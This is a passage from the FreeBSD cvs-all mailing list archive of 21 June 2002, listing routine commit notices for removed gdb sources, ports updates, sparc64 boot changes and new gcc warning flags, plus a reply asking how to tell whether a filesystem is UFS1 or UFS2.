src/contrib/gdb.291/gdb/nlm/configure (dead) 1.2 +0 -55 src/contrib/gdb.291/gdb/nlm/configure.in (dead) 1.2 +0 -1056 src/contrib/gdb.291/gdb/nlm/gdbserve.c (dead) 1.2 +0 -42 src/contrib/gdb.291/gdb/nlm/gdbserve.def (dead) 1.2 +0 -108 src/contrib/gdb.291/gdb/nlm/i386.c (dead) 1.2 +0 -13 src/contrib/gdb.291/gdb/nlm/i386.h (dead) 1.2 +0 -257 src/contrib/gdb.291/gdb/nlm/ppc.c (dead) 1.2 +0 -165 src/contrib/gdb.291/gdb/nlm/ppc.h (dead) 1.2 +0 -67 src/contrib/gdb.291/gdb/nlm/prelude.c (dead) 1.2 +0 -308 src/contrib/gdb.291/gdb/nlmread.c (dead) 1.2 +0 -1 src/contrib/gdb.291/gdb/notify.defs (dead) 1.2 +0 -353 src/contrib/gdb.291/gdb/ns32knbsd-nat.c (dead) 1.6 +0 -988 src/contrib/gdb.291/gdb/objfiles.c (dead) 1.2 +0 -502 src/contrib/gdb.291/gdb/objfiles.h (dead) 1.2 +0 -1444 src/contrib/gdb.291/gdb/ocd.c (dead) 1.2 +0 -139 src/contrib/gdb.291/gdb/ocd.h (dead) 1.2 +0 -1659 src/contrib/gdb.291/gdb/os9kread.c (dead) 1.2 +0 -1013 src/contrib/gdb.291/gdb/parse.c (dead) 1.2 +0 -191 src/contrib/gdb.291/gdb/parser-defs.h (dead) 1.3 +0 -814 src/contrib/gdb.291/gdb/partial-stab.h (dead) 1.2 +0 -387 src/contrib/gdb.291/gdb/ppc-bdm.c (dead) 1.2 +0 -2248 src/contrib/gdb.291/gdb/printcmd.c (dead) 1.2 +0 -1 src/contrib/gdb.291/gdb/process_reply.defs (dead) 1.2 +0 -228 src/contrib/gdb.291/gdb/remote-d10v.c (dead) 1.2 +0 -973 src/contrib/gdb.291/gdb/remote-rdi.c (dead) 1.2 +0 -1206 src/contrib/gdb.291/gdb/remote-sds.c (dead) 1.2 +0 -142 src/contrib/gdb.291/gdb/remote-sim.h (dead) 1.2 +0 -646 src/contrib/gdb.291/gdb/remote-utils.c (dead) 1.2 +0 -142 src/contrib/gdb.291/gdb/remote-utils.h (dead) 1.4 +0 -3678 src/contrib/gdb.291/gdb/remote.c (dead) 1.2 +0 -123 src/contrib/gdb.291/gdb/reply_mig_hack.awk (dead) 1.2 +0 -451 src/contrib/gdb.291/gdb/saber.suppress (dead) 1.2 +0 -414 src/contrib/gdb.291/gdb/scm-exp.c (dead) 1.2 +0 -268 src/contrib/gdb.291/gdb/scm-lang.c (dead) 1.2 +0 -50 src/contrib/gdb.291/gdb/scm-lang.h (dead) 1.2 +0 -385 src/contrib/gdb.291/gdb/scm-tags.h (dead) 1.2 +0 -404 src/contrib/gdb.291/gdb/scm-valprint.c (dead) 1.2 +0 -209 src/contrib/gdb.291/gdb/ser-ocd.c (dead) 1.2 +0 -343 src/contrib/gdb.291/gdb/ser-tcp.c (dead) 1.4 +0 -811 src/contrib/gdb.291/gdb/ser-unix.c (dead) 1.2 +0 -484 src/contrib/gdb.291/gdb/serial.c (dead) 1.2 +0 -182 src/contrib/gdb.291/gdb/serial.h (dead) 1.2 +0 -1549 src/contrib/gdb.291/gdb/sh-stub.c (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/signals.h (dead) 1.2 +0 -1673 src/contrib/gdb.291/gdb/sol-thread.c (dead) 1.8 +0 -2042 src/contrib/gdb.291/gdb/solib.c (dead) 1.2 +0 -60 src/contrib/gdb.291/gdb/solib.h (dead) 1.2 +0 -1506 src/contrib/gdb.291/gdb/source.c (dead) 1.2 +0 -296 src/contrib/gdb.291/gdb/sparclet-rom.c (dead) 1.2 +0 -1232 src/contrib/gdb.291/gdb/sparclet-stub.c (dead) 1.2 +0 -4017 src/contrib/gdb.291/gdb/stabsread.c (dead) 1.2 +0 -225 src/contrib/gdb.291/gdb/stabsread.h (dead) 1.2 +0 -1502 src/contrib/gdb.291/gdb/stack.c (dead) 1.4 +0 -3022 src/contrib/gdb.291/gdb/symfile.c (dead) 1.2 +0 -211 src/contrib/gdb.291/gdb/symfile.h (dead) 1.2 +0 -1053 src/contrib/gdb.291/gdb/symmisc.c (dead) 1.3 +0 -4520 src/contrib/gdb.291/gdb/symtab.c (dead) 1.2 +0 -1222 src/contrib/gdb.291/gdb/symtab.h (dead) 1.4 +0 -2581 src/contrib/gdb.291/gdb/target.c (dead) 1.4 +0 -1265 src/contrib/gdb.291/gdb/target.h (dead) 1.2 +0 -89 src/contrib/gdb.291/gdb/terminal.h (dead) 1.3 +0 -721 src/contrib/gdb.291/gdb/thread.c (dead) 1.2 +0 -46 src/contrib/gdb.291/gdb/thread.h (dead) 1.4 +0 -3677 src/contrib/gdb.291/gdb/top.c (dead) 1.2 +0 -48 src/contrib/gdb.291/gdb/top.h (dead) 1.2 +0 -2780 src/contrib/gdb.291/gdb/tracepoint.c (dead) 1.2 +0 -137 src/contrib/gdb.291/gdb/tracepoint.h (dead) 1.2 +0 -121 src/contrib/gdb.291/gdb/tui/ChangeLog (dead) 1.2 +0 -182 src/contrib/gdb.291/gdb/tui/Makefile (dead) 1.2 +0 -168 src/contrib/gdb.291/gdb/tui/Makefile.in (dead) 1.2 +0 -830 src/contrib/gdb.291/gdb/tui/tui.c (dead) 1.2 +0 -120 src/contrib/gdb.291/gdb/tui/tui.h (dead) 1.2 +0 -215 src/contrib/gdb.291/gdb/tui/tuiCommand.c (dead) 1.2 +0 -24 src/contrib/gdb.291/gdb/tui/tuiCommand.h (dead) 1.2 +0 -1624 src/contrib/gdb.291/gdb/tui/tuiData.c (dead) 1.2 +0 -302 src/contrib/gdb.291/gdb/tui/tuiData.h (dead) 1.2 +0 -400 src/contrib/gdb.291/gdb/tui/tuiDataWin.c (dead) 1.2 +0 -29 src/contrib/gdb.291/gdb/tui/tuiDataWin.h (dead) 1.2 +0 -343 src/contrib/gdb.291/gdb/tui/tuiDisassem.c (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/tui/tuiDisassem.h (dead) 1.2 +0 -469 src/contrib/gdb.291/gdb/tui/tuiGeneralWin.c (dead) 1.2 +0 -31 src/contrib/gdb.291/gdb/tui/tuiGeneralWin.h (dead) 1.2 +0 -734 src/contrib/gdb.291/gdb/tui/tuiIO.c (dead) 1.2 +0 -43 src/contrib/gdb.291/gdb/tui/tuiIO.h (dead) 1.2 +0 -1410 src/contrib/gdb.291/gdb/tui/tuiLayout.c (dead) 1.2 +0 -15 src/contrib/gdb.291/gdb/tui/tuiLayout.h (dead) 1.2 +0 -1210 src/contrib/gdb.291/gdb/tui/tuiRegs.c (dead) 1.2 +0 -28 src/contrib/gdb.291/gdb/tui/tuiRegs.h (dead) 1.2 +0 -465 src/contrib/gdb.291/gdb/tui/tuiSource.c (dead) 1.2 +0 -27 src/contrib/gdb.291/gdb/tui/tuiSource.h (dead) 1.2 +0 -1098 src/contrib/gdb.291/gdb/tui/tuiSourceWin.c (dead) 1.2 +0 -74 src/contrib/gdb.291/gdb/tui/tuiSourceWin.h (dead) 1.2 +0 -554 src/contrib/gdb.291/gdb/tui/tuiStack.c (dead) 1.2 +0 -22 src/contrib/gdb.291/gdb/tui/tuiStack.h (dead) 1.2 +0 -1650 src/contrib/gdb.291/gdb/tui/tuiWin.c (dead) 1.2 +0 -28 src/contrib/gdb.291/gdb/tui/tuiWin.h (dead) 1.2 +0 -302 src/contrib/gdb.291/gdb/typeprint.c (dead) 1.2 +0 -21 src/contrib/gdb.291/gdb/typeprint.h (dead) 1.3 +0 -2934 src/contrib/gdb.291/gdb/utils.c (dead) 1.2 +0 -884 src/contrib/gdb.291/gdb/v850-tdep.c (dead) 1.2 +0 -1213 src/contrib/gdb.291/gdb/valarith.c (dead) 1.2 +0 -2346 src/contrib/gdb.291/gdb/valops.c (dead) 1.2 +0 -1015 src/contrib/gdb.291/gdb/valprint.c (dead) 1.2 +0 -44 src/contrib/gdb.291/gdb/valprint.h (dead) 1.2 +0 -491 src/contrib/gdb.291/gdb/value.h (dead) 1.2 +0 -1418 src/contrib/gdb.291/gdb/values.c (dead) 1.2 +0 -56 src/contrib/gdb.291/gdb/xcoffsolib.h (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13:52:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C1B3537B40B; Fri, 21 Jun 2002 13:52:33 -0700 (PDT) Received: (from fanf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LKqXY96439; Fri, 21 Jun 2002 13:52:33 -0700 (PDT) (envelope-from fanf) Message-Id: <200206212052.g5LKqXY96439@freefall.freebsd.org> From: Tony Finch Date: Fri, 21 Jun 2002 13:52:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/unifdef Makefile unifdef.1 unifdef.c unifdefall.sh X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fanf 2002/06/21 13:52:33 PDT Modified files: (Branch: RELENG_4) usr.bin/unifdef Makefile unifdef.1 unifdef.c Added files: (Branch: RELENG_4) usr.bin/unifdef unifdefall.sh Log: MFC major overhaul and upgrade Revision Changes Path 1.1.1.1.14.1 +5 -0 src/usr.bin/unifdef/Makefile 1.4.2.6 +133 -45 src/usr.bin/unifdef/unifdef.1 1.4.2.2 +862 -517 src/usr.bin/unifdef/unifdef.c 1.1.2.1 +29 -0 src/usr.bin/unifdef/unifdefall.sh (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 13:59:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 98F6237B617; Fri, 21 Jun 2002 13:59:10 -0700 (PDT) Received: (from fanf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LKxA499741; Fri, 21 Jun 2002 13:59:10 -0700 (PDT) (envelope-from fanf) Message-Id: <200206212059.g5LKxA499741@freefall.freebsd.org> From: Tony Finch Date: Fri, 21 Jun 2002 13:59:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xinstall xinstall.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fanf 2002/06/21 13:59:10 PDT Modified files: (Branch: RELENG_4) usr.bin/xinstall xinstall.c Log: MFC rev 1.54: Report errors properly if wait() fails. Revision Changes Path 1.38.2.4 +2 -1 src/usr.bin/xinstall/xinstall.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:18:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E295337B407; Fri, 21 Jun 2002 14:18:45 -0700 (PDT) Received: (from fanf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLIjQ11217; Fri, 21 Jun 2002 14:18:45 -0700 (PDT) (envelope-from fanf) Message-Id: <200206212118.g5LLIjQ11217@freefall.freebsd.org> From: Tony Finch Date: Fri, 21 Jun 2002 14:18:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/astro/xearth/files freebsd.committers.markers X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fanf 2002/06/21 14:18:45 PDT Modified files: astro/xearth/files freebsd.committers.markers Log: Send missiles to me care of the University of Cambridge Computing Service Revision Changes Path 1.99 +1 -1 ports/astro/xearth/files/freebsd.committers.markers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:32:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C3ACC37B406; Fri, 21 Jun 2002 14:32:12 -0700 (PDT) Received: (from ache@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLWCd16503; Fri, 21 Jun 2002 14:32:12 -0700 (PDT) (envelope-from ache) Message-Id: <200206212132.g5LLWCd16503@freefall.freebsd.org> From: "Andrey A. Chernov" Date: Fri, 21 Jun 2002 14:32:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13 Makefile pkg-plist ports/www/apache13/files patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ache 2002/06/21 14:32:12 PDT Modified files: www/apache13 Makefile pkg-plist www/apache13/files patch-ab Log: Rename .default suffix to -dist, probably it will be less confusing Revision Changes Path 1.121 +2 -2 ports/www/apache13/Makefile 1.24 +10 -10 ports/www/apache13/files/patch-ab 1.46 +47 -47 ports/www/apache13/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:37:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 312BB37B401; Fri, 21 Jun 2002 14:37:35 -0700 (PDT) Received: (from jesper@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLbZo18063; Fri, 21 Jun 2002 14:37:35 -0700 (PDT) (envelope-from jesper) Message-Id: <200206212137.g5LLbZo18063@freefall.freebsd.org> From: Jesper Skriver Date: Fri, 21 Jun 2002 14:37:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/p5-JUNOScript Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jesper 2002/06/21 14:37:35 PDT Modified files: net/p5-JUNOScript Makefile pkg-plist Log: Finish the upgrade to 5.3R2.4 Remove all restrictions after permission from Wendy Cartee Copy the distfile to MASTER_SITE_LOCAL so we can fetch it, it's only fetchable via https from Juniper Revision Changes Path 1.5 +5 -20 ports/net/p5-JUNOScript/Makefile 1.2 +4 -4 ports/net/p5-JUNOScript/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:52:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5992F37B40A; Fri, 21 Jun 2002 14:52:07 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLq7I23740; Fri, 21 Jun 2002 14:52:07 -0700 (PDT) (envelope-from mi) Message-Id: <200206212152.g5LLq7I23740@freefall.freebsd.org> From: Mikhail Teterin Date: Fri, 21 Jun 2002 14:52:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/libstocks Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/21 14:52:07 PDT Modified files: devel/libstocks Makefile Log: My first PERL -> REINPLACE_CMD conversion. Make sure not to leave anything behind by explicitly giving "" to -i -- why is that not a default, I wonder. Revision Changes Path 1.2 +7 -3 ports/devel/libstocks/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:52:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C724E37B407; Fri, 21 Jun 2002 14:52:26 -0700 (PDT) Received: (from dirk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLqQ823871; Fri, 21 Jun 2002 14:52:26 -0700 (PDT) (envelope-from dirk) Message-Id: <200206212152.g5LLqQ823871@freefall.freebsd.org> From: Dirk Froemberg Date: Fri, 21 Jun 2002 14:52:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/mod_php4 Makefile ports/www/mod_php4/files patch-sapi_apache2filter_php_functions.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dirk 2002/06/21 14:52:26 PDT Modified files: www/mod_php4 Makefile Added files: www/mod_php4/files patch-sapi_apache2filter_php_functions.c Log: Fix compile error with apache-2.0.39. PR: ports/39529 Submitted by: Chris Revision Changes Path 1.175 +1 -1 ports/www/mod_php4/Makefile 1.1 +11 -0 ports/www/mod_php4/files/patch-sapi_apache2filter_php_functions.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 14:57:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B880037B408; Fri, 21 Jun 2002 14:57:14 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LLvEQ25135; Fri, 21 Jun 2002 14:57:14 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206212157.g5LLvEQ25135@freefall.freebsd.org> From: Jimmy Olgeni Date: Fri, 21 Jun 2002 14:57:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fm/rox-session Makefile distinfo ports/x11-fm/rox-session/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/21 14:57:14 PDT Modified files: x11-fm/rox-session Makefile distinfo Removed files: x11-fm/rox-session/files patch-aa Log: Update port to version 0.1.16. Revision Changes Path 1.6 +1 -1 ports/x11-fm/rox-session/Makefile 1.5 +1 -1 ports/x11-fm/rox-session/distinfo 1.2 +0 -10 ports/x11-fm/rox-session/files/patch-aa (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:15:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 01FF937B494; Fri, 21 Jun 2002 15:15:04 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMF3u32762; Fri, 21 Jun 2002 15:15:03 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206212215.g5LMF3u32762@freefall.freebsd.org> From: Jimmy Olgeni Date: Fri, 21 Jun 2002 15:15:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/webmin Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/21 15:15:03 PDT Modified files: sysutils/webmin Makefile distinfo Log: Update modules: pserver, file. Revision Changes Path 1.116 +3 -2 ports/sysutils/webmin/Makefile 1.90 +2 -0 ports/sysutils/webmin/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:16:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EAA1037B404; Fri, 21 Jun 2002 15:15:54 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMFsd33099; Fri, 21 Jun 2002 15:15:54 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206212215.g5LMFsd33099@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Fri, 21 Jun 2002 15:15:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/21 15:15:54 PDT Modified files: net/samba Makefile Log: Fix dependencies when installing samba on a fresh install Bump PORTREVISION Submitted by: gregp@blackened.net Revision Changes Path 1.93 +5 -5 ports/net/samba/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:34: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C42B537B406; Fri, 21 Jun 2002 15:33:56 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMXu537889; Fri, 21 Jun 2002 15:33:56 -0700 (PDT) (envelope-from jake) Message-Id: <200206212233.g5LMXu537889@freefall.freebsd.org> From: Jake Burkholder Date: Fri, 21 Jun 2002 15:33:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/boot/common ufsread.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/21 15:33:56 PDT Modified files: sys/boot/common ufsread.c Log: Enable UFS1_AND_UFS2 support for sparc64 by default. Booting from ufs1 or ufs2 filesystems seems to work fine. Revision Changes Path 1.5 +2 -0 src/sys/boot/common/ufsread.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:35:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 269BB37B412; Fri, 21 Jun 2002 15:34:52 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMYqS38044; Fri, 21 Jun 2002 15:34:52 -0700 (PDT) (envelope-from jake) Message-Id: <200206212234.g5LMYqS38044@freefall.freebsd.org> From: Jake Burkholder Date: Fri, 21 Jun 2002 15:34:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/boot/sparc64/loader Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/21 15:34:52 PDT Modified files: sys/boot/sparc64/loader Makefile Log: Enable cd9660 support by default. Revision Changes Path 1.9 +1 -1 src/sys/boot/sparc64/loader/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:39:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 74F3737B49A; Fri, 21 Jun 2002 15:38:06 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMc6138759; Fri, 21 Jun 2002 15:38:06 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212238.g5LMc6138759@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 15:38:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc c-decl.c calls.c flags.h invoke.texi toplev.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 15:38:06 PDT Modified files: (Branch: RELENG_4) contrib/gcc c-decl.c calls.c flags.h invoke.texi toplev.c Log: Add -Wframe-size-XXXX, which warns if frame uses greater than specified bytes; and and -Warglist-size-XXXX, which warns if function argument list uses greater than specified bytes. Submitted by: julian, mp Obtained from: http://gcc.gnu.org/ml/gcc-patches/2001-01/msg02232.html http://gcc.gnu.org/ml/gcc-patches/2001-01/msg01943.html Reminded by: sam Wish he had pushed this into gcc3: julian Revision Changes Path 1.1.1.4.2.3 +21 -1 src/contrib/gcc/c-decl.c 1.1.1.3.2.2 +8 -0 src/contrib/gcc/calls.c 1.4.2.1 +13 -1 src/contrib/gcc/flags.h 1.6.2.4 +14 -3 src/contrib/gcc/invoke.texi 1.6.2.7 +22 -1 src/contrib/gcc/toplev.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:46:20 2002 Delivered-To: cvs-all@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 1F8EB37B429; Fri, 21 Jun 2002 15:45:44 -0700 (PDT) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020621224543.FRMJ11426.rwcrmhc51.attbi.com@bmah.dyndns.org>; Fri, 21 Jun 2002 22:45:43 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.3/8.12.3) with ESMTP id g5LMjhkR080807; Fri, 21 Jun 2002 15:45:43 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.3/8.12.3/Submit) id g5LMjhxT080806; Fri, 21 Jun 2002 15:45:43 -0700 (PDT) (envelope-from bmah) Message-Id: <200206212245.g5LMjhxT080806@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020506 with nmh-1.0.4 To: Kirk McKusick Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/include/protocols dumprestore.h src/lib/libstand ufs.c src/release/picobsd/build write_mfs_in_kernel.c src/sbin Makefile src/sbin/badsect badsect.c src/sbin/clri clri.c src/sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c ... In-Reply-To: <200206210618.g5L6I5w81565@freefall.freebsd.org> References: <200206210618.g5L6I5w81565@freefall.freebsd.org> Comments: In-reply-to Kirk McKusick message dated "Thu, 20 Jun 2002 23:18:05 -0700." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.org X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_1910483383P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 21 Jun 2002 15:45:43 -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --==_Exmh_1910483383P Content-Type: text/plain; charset=us-ascii If memory serves me right, Kirk McKusick wrote: > New filesystems built using newfs can be built in either > UFS1 or UFS2 format using the -O option. In this commit UFS1 is > the default format, so if you want to build UFS2 format filesystems, > you must specify -O 2. Is there a way to find out the format of an existing filesystem? Thanks, Bruce. --==_Exmh_1910483383P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Exmh version 2.5+ 20020506 iD8DBQE9E6yX2MoxcVugUsMRAlYVAJ0R/mHbmqij+ZPA5PxQ+SRGDoMtZACfQmbT 0sD+5d64OtkdGea41sLRgow= =JUiX -----END PGP SIGNATURE----- 